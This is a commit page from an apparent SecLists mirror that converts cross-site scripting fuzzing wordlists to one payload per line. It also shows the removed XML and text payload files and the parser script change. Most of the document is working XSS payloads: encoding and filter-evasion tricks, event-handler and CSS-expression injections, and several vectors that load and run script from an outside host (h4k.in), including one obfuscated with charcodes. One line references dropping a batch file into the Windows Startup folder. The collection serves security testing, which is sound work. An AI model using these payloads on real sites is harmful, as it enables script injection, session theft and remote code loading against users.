sync/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2025-04-28 01:36:29 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions 2

Made files robot friendly

Browse source
This commit is contained in:
Mo Langning 2024-02-14 21:06:29 +08:00
parent d0b72e7e31
commit 0f63e7f3d5
13 changed files with 456 additions and 8713 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
.bin/xml-parser.py Normal file → Executable file
View file

@ -2,9 +2,9 @@
import os
import sys
import xml.etree.ElementTree as ET
import xml.etree.ElementTree as et
if not sys.argv[1]:
if len(sys.argv) == 1:
exit(0)
files=sys.argv[1].split(" ")
@ -15,4 +15,27 @@ for i in files:
exit(2)
for i in files:
ET
xml_file = et.parse(i)
contents = []
for j in xml_file.getroot().findall("attack"):
xss = j.find('code').text
if not xss:
continue
if "\n" in xss:
print("Xss have newline in it.")
print(xss, "\n")
contents.append(xss)
file_dir, file_name = i.rsplit("/", 1)
file_name = os.path.join(file_dir, file_name.rsplit(".", 1)[0] + ".txt")
open(file_name, "w").write("\n".join(contents))
print(f"Wrote to {file_name}")

217
Fuzzing/XSS/XSS-EnDe-evation.txt
View file

@ -1,217 +0,0 @@
# =========================================================================== #
#?
#? NAME
#? xss-evation.txt
#?
#? SYNOPSIS
#?
#? DESCRIPTION
#? List of Cross-site Scriptings (XSS) samples.
#? Empty lines and lines starting with a # are comments and should be
#? ignored. All other lines contain one payload per line.
#?
# HACKER's INFO
# This file used in EnDe's "Load File" menu.
#?
#? VERSION
#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43
#?
#? AUTHOR
#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net
#?
# =========================================================================== #
#group most-in-one pattern
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
#group general filter evasion
"'><script>alert('XSS')</script>
"'><script>alert(/XSS/)</script>
"'><script>alert(42)</script>
"'><script>prompt(42)</script>
"'><script>confirm(42)</script>
"'><sCriPt>confirm(42)</sCriPt>
"'><script >confirm(42)</script >
"'><script foo=bar>confirm(42)</script>
"'><\script>confirm(42)</script>
"'><sc\ript>confirm(42)</script>
"'><sc\tript>confirm(42)</script>
"'><script onlyOpera:-)>alert(42)
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
"'><script x:href='//evil.com/onlyOpera'>
"'><///script///>alert(42)</script>
"'><///style///>alert(42)</script>
"'><;(24)trela=daolno ;''=e>'=d
"'><;(24)trela=daolno ;''=/e>'=d
"'><isindex action="javas&Tab;cript:alert(42)" type=image>
# real tab
"'><sc ript>confirm(42)</script>
# URL-encoded
"'%3e%3cscript%3econfirm(42)%3c/script%3e
"'%253e%253cscript%253econfirm(42)%253c/script%253e
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
# Unicode characters
"'><script>\u0061lert(42)</script>
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
#group javascript keywords
javascript:alert(42)
javascript:prompt(42)
javascript:confirm(42)
jAvasCript:confirm(42)
jAvas\Cript:confirm(42)
jAvas Cript:confirm(42)
jAvas/* */Cript:confirm(42)
javascript:alert(42)
document
document.
top
top.
top[
eval
eval(
cookie
.cookie
#group HTML event keywords
onerror
onerror=
onclick
onclick=
onmouseover
onmouseover=
onload
onload=
"onerror
"onerror=
"onclick
"onclick=
"onmouseover
"onmouseover=
"onload
"onload=
#group HTML tag attribute keywords
href=
src=
link=
style=
alt=
title=
egal=
"href=
"src=
"link=
"style=
"alt=
"title=
"egal=
#group HTML tag keywords
<a
<a href=
<a alt=42 href=
<a href="javascript:
<a href=" javascript:
<p
<div
<iframe
<index
<layer
<link
<meta
<style
<script
<img src="/" =_=" title="onerror='alert(42)'">
<img src ?notinChrome?\/onerror = alert(42)
<img src ?notinChrome?\/onerror=alert(42)
<img/alt="/"src="/"onerror=alert(42)>
<iframe/src \/\/onload = alert(42)
<iframe/onreadystatechange=alert(42)
<!-- open comment
<!-- complete comment -->
--><!-- close/complete comment -->
<![CDATA[
<![CDATA[ open cdata
<![CDATA[ complete cdata ]]>
]]><![CDATA[ close/complete cdata ]]>
<?xml
<?xml version="1.0">
#group general IE
" value=``
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group general IE CSS expression injection
<div style="{ left:expression( alert('XSS') ) }">
#group IE CSS expression variants
left:expr/**/ession(alert('XSS'))
left:expr/* */ession(alert('XSS'))
left:e\0078pr\0065ssion(alert('XSS'))
left:\0065\0078pr\0065ssion(alert('XSS'))
left:expr\65ssion(alert('XSS') ))
left:expr\0065ssion(alert('XSS'))
left:expr&#x65;ssion(alert('XSS'))
left:expr&#101;ssion(alert('XSS'))
left:expr&#x0065;ssion(alert('XSS'))
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS'))
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group IE CSS expression in fullwidth (same as above)
left:(alert('XSS'))
#group IE CSS expression in capital letters
left:EXPR/**/ESSION(alert('XSS'))
left:EXPR/* */ESSION(alert('XSS'))
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS'))
left:(alert('XSS'))
#group IE CSS expression with foreign Unicode letters
left:exp\0280essio\0274(alert('XSS'))
left:exp\0280essio\207f(alert('XSS'))
left:expʀessioɴ(alert('XSS'))
left:expʀessioⁿ(alert('XSS'))
# see http://openmya.hacker.jp/hasegawa/security/expression.txt also
#group Unicode Left/Right Pointing Double Angel Quotation Mark
# improved pattern from: http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html
%u00ABscript%u00BB
&#x3008;script&#x3009;
U%2bFF1CscriptU%2bFF1E
&#x2039;script&#x203A;
&#x2329;script&#x232A;
&#x27E8;script&#x27E9;
#group data: URL
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
#group PHP
# use of $_SERVER['PHP_SELF']
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
<%<!--'%><script>alert(42);</script -->

1287
Fuzzing/XSS/XSS-EnDe-h4k.xml
View file

File diff suppressed because it is too large Load diff

534
Fuzzing/XSS/XSS-EnDe-mario.xml
View file

@ -1,534 +0,0 @@
<?xml version="1.0"?>
<!-- from: http://mario.heideri.ch/xss.xml
date: 03-jan-08
minor formal modifications
-->
<xss>
<attack>
<name> --- Reflective XSS Attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced XSS Locator</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Advanced XSS Locator for &amp;lt;title&amp;gt;-Injections</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 1 (all quotes)</name>
<code>&apos;&apos;;!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 2 (double quotes)</name>
<code>&quot;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 3 (single quotes)</name>
<code>&apos;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 4 (attributes)</name>
<code>&apos;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - credits go to Alex</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Semicolon XSS (HTML)</name>
<code>&lt;img src=x onerror=;;alert(1) /&gt;</code>
<desc>HTML Breaker - credits go to Kishor</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Title-breaker</name>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>HTML-breaking XSS for backticked attributes</name>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Textarea-breaker (onmouseover)</name>
<code>&lt;/textarea&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Noscrript-breaker (onmouseover)</name>
<code>&lt;/noscript&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Style-breaker</name>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Reflective JS XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>JS Breaking XSS 1</name>
<code>;}alert(0);{</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>JS Breaking XSS 2 (string concatination)</name>
<code>&quot;+alert(0)+&quot;</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>onerror XSS Injection</name>
<code>xyz onerror=alert(6); </code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>onclick XSS Injection</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 1</name>
<code>a=eval;b=alert;a(b(8));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 2</name>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;;//%0da=eval;b=alert;a(b(9));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (double qouted)</name>
<code>&quot;;//%0da=eval;b=alert;a(b(10));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;};a=eval;b=alert;a(b(13));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (double qouted)</name>
<code>&quot;};a=eval;b=alert;a(b(12));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (non-qouted)</name>
<code>1};a=eval;b=alert;a(b(14));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (sinlge qouted)</name>
<code>&apos;];a=eval;b=alert;a(b(15));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (double qouted)</name>
<code>&quot;];a=eval;b=alert;a(b(16));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (non qouted)</name>
<code>1];a=eval;b=alert;a(b(17));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Int-breaking JS Injection (non qouted)</name>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>CRLF-forced JS Injection</name>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JS Comment breaker</name>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name> --- JS Includes ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Tiny XSS Include 1 (20 characters, FFox only)</name>
<code>&lt;script src=//h4k.in</code>
<desc>Super-tiny inclusion vector - 20 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 2 (27 characters - all browsers)</name>
<code>&lt;script src=http://h4k.in/&gt;</code>
<desc>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 3 (30 characters - all browsers)</name>
<code>&lt;script src=//h4k.in&gt;&lt;/script&gt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 4 (HTML Breaking)</name>
<code>&quot;&gt;&lt;script src=//h4k.in&gt;&lt;/script&gt;&lt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - breaks HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Fragmented DOM XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Include Fragment Pt. 1</name>
<code>&lt;scri</code>
<desc>First part of a fragmented inclusion attack vector. Swallows the enclosed HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 2</name>
<code>pt src=//h4k.in&gt;&lt;</code>
<desc>Second part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 3</name>
<code>&gt;&lt;/script&gt;</code>
<desc>Third part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- HTML Injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced HTML Injection Locator</name>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 1 (http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script src=http://h4k.in/i.js&gt;&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 2 (using JS - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;a=document.createElement(&apos;script&apos;);a.src=&apos;http://h4k.in/i.js&apos;;document.body.appendChild(a);&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 3 (using charcode - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<!-- disabled 03-jan-08
<attack>
<name> ___ SQL Injections ___x</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Basic SQL Injection 1</name>
<code> 1 OR 1 = 1 </code>
<desc>Very basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 2</name>
<code>1' OR '1'='1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 3</name>
<code>1\'1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 4</name>
<code>') OR 1 &lt; 2 #</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
-->
<attack>
<name> --- Browser specific attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>IE VBScript injection</name>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE expression injection</name>
<code>&quot; style=&quot;color: expression(alert(0));&quot; a=&quot;</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE closing-tag expression injection</name>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE backticked semicolon injection</name>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection</name>
<code>&quot; style=&quot;-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<desc>This works in Gecko browsers only.</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection (filter evading)</name>
<code>&quot; sstyle=&quot;foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<desc>This works in Gecko browsers only. Was once used on php.net</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Weird stuff ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>HTTP Reponse Splitting XSS</name>
<code>%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/</code>
<desc>HTTP response splitting vector with XSS alert</desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name>Nullbyte XSS</name>
<code>c%00&quot;&quot;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc></desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Style injections and hw/fw-encoding attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</name>
<code>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>x=alert;x(%26%2340 /finally through!/.source %26%2341);</name>
<code>x=alert;x(%26%2340 /finally through!/.source %26%2341);</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</name>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- URL injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>http://aa&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;</name>
<code>http://aa&lt;script&gt;alert(123)&lt;/script&gt;</code>
<desc></desc>
<label>URL injection</label>
<browser/>
</attack>
</xss>

1080
Fuzzing/XSS/XSS-EnDe-xssAttacks.xml
View file

File diff suppressed because it is too large Load diff

2690
Fuzzing/XSS/XSS-payloadbox.txt
View file

File diff suppressed because it is too large Load diff

64
Fuzzing/XSS/robot-friendly/README.md
View file

@ -10,4 +10,66 @@ Some XSS trigger condition may require you to interact with the web pages to tri
To see the results, look out for message popups or network activity in the devtools of your browser.
Happy hacking!
Happy hacking!
## Removed xss
### XSS-EnDe-h4k.txt
Removed because there was no way to squash it into one line
```
_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)
```
### XSS-EnDe-xssAttacks.txt
Also removed due to it's multiline nature
```
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
```

206
Fuzzing/XSS/robot-friendly/XSS-EnDe-h4k.txt Normal file
View file

@ -0,0 +1,206 @@
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
<div&nbsp;style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
<BASE HREF="javascript:alert('XSS');//">
`> <script>alert(5)</script>
> <script>alert(4)</script>
xyz onerror=alert(6);
1;a=eval;b=alert;a(b(/c/.source));
1];a=eval;b=alert;a(b(17));//
];a=eval;b=alert;a(b(16));//
'];a=eval;b=alert;a(b(15));//
1};a=eval;b=alert;a(b(14));//
'};a=eval;b=alert;a(b(13));//
};a=eval;b=alert;a(b(12));//
a=1;a=eval;b=alert;a(b(11));//
;//%0da=eval;b=alert;a(b(10));//
';//%0da=eval;b=alert;a(b(9));//
'> <script>alert(3)</script>
</title><script>alert(1)</script>
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<!--<A href="- --><a href=javascript:alert:document.domain>test-->
<IMG SRC=JaVaScRiPt:alert('XSS')>
